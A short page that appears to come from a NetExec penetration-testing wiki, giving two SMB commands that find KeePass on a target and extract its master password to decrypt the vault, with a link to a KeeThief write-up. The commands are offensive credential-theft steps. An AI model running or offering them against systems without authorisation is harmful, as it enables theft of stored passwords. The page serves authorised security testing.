Dump KeePass

You can check if keepass is installed on the target computer and then steal the master password and decrypt the database !

$ NetExec smb <ip> -u user -p pass -M keepass_discover
$ NetExec smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"

KeeThief - A Case Study in Attacking KeePass Part 2 - harmj0yharmj0y

PreviousDump WIFI password NextDump DPAPI

Last updated 7 months ago